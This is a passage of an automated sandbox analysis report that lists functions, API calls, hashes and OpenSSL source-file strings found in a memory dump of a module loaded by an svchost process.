                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$X_newmemcpy
                                                                                              • String ID: ssl\record\methods\tls13_meth.c$tls13_set_crypto_state
                                                                                              • API String ID: 3455081293-161958930
                                                                                              • Opcode ID: e3be309d963c88f2fe24521019dd4e2fc3f73837044a9501c9475d7630e1dba2
                                                                                              • Instruction ID: a5f9628559a62b9ad47a9479698f0e6841343a7bb72cb3611e06abf03ed13c19
                                                                                              • Opcode Fuzzy Hash: e3be309d963c88f2fe24521019dd4e2fc3f73837044a9501c9475d7630e1dba2
                                                                                              • Instruction Fuzzy Hash: B541A272A0968282E662DB76D5917BE7360EF85784F408131EE6C47AF6DF3CE148CB00
                                                                                              Function 00007FFBAB41A320 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_errorX_freeX_new_from_name
                                                                                              • String ID: ssl\s3_lib.c$ssl_generate_pkey_group
                                                                                              • API String ID: 1495955094-2105823734
                                                                                              • Opcode ID: 844b4cd634b56560445525d614e96ae7fb6d62c2002cb2220d5f785b33164284
                                                                                              • Instruction ID: 699205f3e41dd82371b5a1f3504c7e60b33f0bfc1850bd00150f067b2c7a6a45
                                                                                              • Opcode Fuzzy Hash: 844b4cd634b56560445525d614e96ae7fb6d62c2002cb2220d5f785b33164284
                                                                                              • Instruction Fuzzy Hash: 844163B1E5E74282E662E772E5926BE2311BF84780F408436ED7D47AB6DE6CE5088701
                                                                                              Function 00007FFBAB430970 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_error
                                                                                              • String ID: SSL_CTX_use_PrivateKey_file$ssl\ssl_rsa.c
                                                                                              • API String ID: 1899708915-1288404938
                                                                                              • Opcode ID: 566ff9b448db7582449d80dcdbec908e32c8caa8934769aaaa3b523820c779ea
                                                                                              • Instruction ID: 77a83e85d800906f76c2459effbf36925335ec52543ce582cece963b1ea6f445
                                                                                              • Opcode Fuzzy Hash: 566ff9b448db7582449d80dcdbec908e32c8caa8934769aaaa3b523820c779ea
                                                                                              • Instruction Fuzzy Hash: 2541B2A1A4EA4681F622EB72E8513FD2351EF84B80F54C036ED6D577B6DE3CE50A8301
                                                                                              Function 00007FFBAB433020 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 95COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_ctrlO_freeO_newO_s_fileR_set_error
                                                                                              • String ID: SSL_use_RSAPrivateKey_file$ssl\ssl_rsa_legacy.c
                                                                                              • API String ID: 1899708915-461091929
                                                                                              • Opcode ID: 5cde4c806b710f76ed28160dbc15bad2ebd6843a0016fdf10aa6ab05bda00406
                                                                                              • Instruction ID: deeac1462d72cbdfe0729cfd270f45b6f6dcb370e54c8df0c926981d7306e086
                                                                                              • Opcode Fuzzy Hash: 5cde4c806b710f76ed28160dbc15bad2ebd6843a0016fdf10aa6ab05bda00406
                                                                                              • Instruction Fuzzy Hash: C23180B1A4E64381FA62E772D8921BD2351AF84B80F58C431ED7D477B7DE2CE50A8741
                                                                                              Function 00007FFBAB48A900 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 187COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A92F
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A947
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A98D
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48F66B), ref: 00007FFBAB48A9A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_error
                                                                                              • String ID: set_client_ciphersuite$ssl\statem\statem_clnt.c
                                                                                              • API String ID: 4275876640-3316213183
                                                                                              • Opcode ID: 0da9d00d88a3c9e4bc4e657cc29b7de6a08c5f5cfb86228f52ce337bad5db1ec
                                                                                              • Instruction ID: da6c8d986922608e429e8093f057fa299834d7178b20fb2d560999c257689f07
                                                                                              • Opcode Fuzzy Hash: 0da9d00d88a3c9e4bc4e657cc29b7de6a08c5f5cfb86228f52ce337bad5db1ec
                                                                                              • Instruction Fuzzy Hash: E781B3A1B0A68285E792DB72E4917BD2351EF44B84F04C431DF2D87BB6DE6DE4858740
                                                                                              Function 00007FFBAB4266C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 128COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_set_error$L_sk_new_null
                                                                                              • String ID: SSL_dane_enable$ssl\ssl_lib.c
                                                                                              • API String ID: 960851727-1732324311
                                                                                              • Opcode ID: 83a753f3cd16f23e90cc5c6fc46ade45cdee53ad99802808ec23b49fcba1e73a
                                                                                              • Instruction ID: 29c554ac5a372336842be3cb09ee2611b84833c9f60ac10e51148f89e4bdf5df
                                                                                              • Opcode Fuzzy Hash: 83a753f3cd16f23e90cc5c6fc46ade45cdee53ad99802808ec23b49fcba1e73a
                                                                                              • Instruction Fuzzy Hash: D651D5B1A0A54282F7A29B36E4817BD2351EF40794F849135EE7D43AF9DF3CE4958701
                                                                                              Function 00007FFBAB49BBC0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$Y_free
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_cke_dhe
                                                                                              • API String ID: 2633058761-2145857467
                                                                                              • Opcode ID: 32861d7e0c462356a77c90ea6bdff1ef6e75bd714c85a65ad47899a9e052be1d
                                                                                              • Instruction ID: 292965b43863e170442ae6ceb1d7e212148877639f28a080cc0982d33651269d
                                                                                              • Opcode Fuzzy Hash: 32861d7e0c462356a77c90ea6bdff1ef6e75bd714c85a65ad47899a9e052be1d
                                                                                              • Instruction Fuzzy Hash: 64414DE1A5EA8281FA229B72D8D13BD6361EF40B80F44C531DE2D576B6DE3DE5468700
                                                                                              Function 00007FFBAB44E980 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 248COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_family$R_set_debug$R_newR_set_error$E_newE_save
                                                                                              • String ID: QUIC error code: 0x%llx%s%s%s, reason: "%s"$ch_rx_handle_packet$ossl_quic_channel_raise_protocol_error_loc$packet header reserved bits$ssl\quic\quic_channel.c
                                                                                              • API String ID: 1562493706-209172816
                                                                                              • Opcode ID: 3fe0d78d965c727c65b80cbfd3ba234ad12b654d972b08e2f3a73d7082e785bc
                                                                                              • Instruction ID: 852e86f5632684593ac720099935ae4223ab2cbf0b91483d4c8d53851a25c9a3
                                                                                              • Opcode Fuzzy Hash: 3fe0d78d965c727c65b80cbfd3ba234ad12b654d972b08e2f3a73d7082e785bc
                                                                                              • Instruction Fuzzy Hash: 8FB191B2A0AA8186EA6ADB35D4603BA73A0FB45744F448136DFAE437A1DF3CE454C705
                                                                                              Function 00007FFBAB41EA30 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 101stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: strncmp$R_newR_set_debugR_set_error
                                                                                              • String ID: ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list$ssl\ssl_ciph.c
                                                                                              • API String ID: 1930259724-2296690422
                                                                                              • Opcode ID: 2bf9c61d0cf00fcf681b01301d94d4c4e35cb472c0d7981903dc81469af40b39
                                                                                              • Instruction ID: 1e3fe5f7b5d91a1057de5f9dfb70b4eb9bf1348bda0ea3ec32066af222e428e7
                                                                                              • Opcode Fuzzy Hash: 2bf9c61d0cf00fcf681b01301d94d4c4e35cb472c0d7981903dc81469af40b39
                                                                                              • Instruction Fuzzy Hash: A64171B6E4AA069AE712CB35F8513783BA4EB44784F44C43ADE2E836B1DF2CE554C741
                                                                                              Function 00007FFBAB430210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: ssl\ssl_lib.c$ssl_write_internal
                                                                                              • API String ID: 1552677711-1479096089
                                                                                              • Opcode ID: 0f7e84e985252aa8de3cc70d5b7bdf48916e1e6196117957bbcbb42a36f39f56
                                                                                              • Instruction ID: e432cba98b643bcc00d6ded517e26c1a803b437d62fc4a196fd1ce0792c3fc35
                                                                                              • Opcode Fuzzy Hash: 0f7e84e985252aa8de3cc70d5b7bdf48916e1e6196117957bbcbb42a36f39f56
                                                                                              • Instruction Fuzzy Hash: 1E517272A09A4182F7529B39E4912BD6361EB54B84F548135EE6C43BFADF3CD4958B00
                                                                                              Function 00007FFBAB4509D0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 139COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OSSL_ERR_STATE_restore.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450A89
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450AAC
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450AC4
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450B3C
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450B43
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450B5B
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450B96
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450BC7
                                                                                              • OSSL_ERR_STATE_new.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450BD8
                                                                                              • OSSL_ERR_STATE_save.LIBCRYPTO-3-X64(?,00000000,?,?,000C0103,?,00007FFBAB44F52D,?,00007FFBAB450F40), ref: 00007FFBAB450BEC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debug$R_newR_set_error$E_newE_restoreE_save
                                                                                              • String ID: QUIC error code: 0x%llx%s%s%s (triggered by frame type: 0x%llx%s%s%s), reason: "%s"$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ossl_quic_channel_raise_protocol_error_loc$ssl\quic\quic_channel.c
                                                                                              • API String ID: 4176084029-936738589
                                                                                              • Opcode ID: 2f5d62f6c2d42027207889810569f5974fd8bd41f677c318e6c85848605e963a
                                                                                              • Instruction ID: fd58a20d37dcd01c952632132f99f749b49f894a1963f3d81c1c8c667fb33e4c
                                                                                              • Opcode Fuzzy Hash: 2f5d62f6c2d42027207889810569f5974fd8bd41f677c318e6c85848605e963a
                                                                                              • Instruction Fuzzy Hash: F15161B660EB8581EA62DB61F9507BAB3A4FB84784F048535EE9D03B69DF3CD445C700
                                                                                              Function 00007FFBAB492360 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB411C50: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB411C95
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB49238B
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB4923A3
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB4923F4
                                                                                              • OPENSSL_sk_value.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB492405
                                                                                              • i2d_X509_NAME.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB49241B
                                                                                              • i2d_X509_NAME.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB492449
                                                                                              • OPENSSL_sk_num.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB492457
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB49246C
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47B727), ref: 00007FFBAB492484
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_numR_newR_set_debugX509_i2d_$L_sk_valueO_zallocR_vset_error
                                                                                              • String ID: construct_ca_names$ssl\statem\statem_lib.c
                                                                                              • API String ID: 3967720115-3433467796
                                                                                              • Opcode ID: 65d90259314d5bc2c3ca5da892dfad4ecb74932502eb33e23e78017f74662cba
                                                                                              • Instruction ID: 988055b3c96940c923c5b47bff178365bb5ace16fbd8b2eb1f08fd41ce698471
                                                                                              • Opcode Fuzzy Hash: 65d90259314d5bc2c3ca5da892dfad4ecb74932502eb33e23e78017f74662cba
                                                                                              • Instruction Fuzzy Hash: 904182A1F0E25381F663E772E8925BD5254AF847D0F448431DE2D87BB6EE3CE5468311
                                                                                              Function 00007FFBAB480F10 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$memcmp
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_renegotiate
                                                                                              • API String ID: 4071200903-678074351
                                                                                              • Opcode ID: 1c68670593f75e14462b4233b901ff831ffe0b28bd8abc49050f6258505b1373
                                                                                              • Instruction ID: b0301e6940dae0b03c3bc0f64555c462347b8049eb706a6fb174c77b1fec1104
                                                                                              • Opcode Fuzzy Hash: 1c68670593f75e14462b4233b901ff831ffe0b28bd8abc49050f6258505b1373
                                                                                              • Instruction Fuzzy Hash: C541B3B1B1F68281EB529B71D8916BC6350EF44B84F04C432EF2D47BAADF6CE5968300
                                                                                              Function 00007FFBAB44DBA4 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_set_debug$E_newE_saveR_newR_set_error
                                                                                              • String ID: DISABLE_ACTIVE_MIGRATION appears multiple times$DISABLE_ACTIVE_MIGRATION is malformed$ORIG_DCID was not sent but is required$QUIC error code: 0x%llx%s%s%s, reason: "%s"$ch_on_transport_params$ossl_quic_channel_raise_protocol_error_loc$ssl\quic\quic_channel.c
                                                                                              • API String ID: 2363558997-1192419531
                                                                                              • Opcode ID: 5830b729496d42124c96b86375396b27e3c5cb77b2503c8a1b9c9641ad83453c
                                                                                              • Instruction ID: ae105b5945cbd8f7e559762043c1d2de1805ccf495c0c29c7992fdecd3dcb02b
                                                                                              • Opcode Fuzzy Hash: 5830b729496d42124c96b86375396b27e3c5cb77b2503c8a1b9c9641ad83453c
                                                                                              • Instruction Fuzzy Hash: C141BFB2A0EB5296FB5ADB70E4512BD63A0FB04344F448439DE6D17AA5DF3CE465C300
                                                                                              Function 00007FFBAB416310 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_ctrlO_freeR_vset_error
                                                                                              • String ID: ssl3_digest_cached_records$ssl\s3_enc.c
                                                                                              • API String ID: 2289415696-2941011472
                                                                                              • Opcode ID: da33691dc6dd1cb9f7b7ff8dcae513d8a162f21f9c151df262fa9d1f417888f7
                                                                                              • Instruction ID: c25e742090f6dabbeca98802372a3516c5f4d9c5946b744636ae6a211ccc6ecf
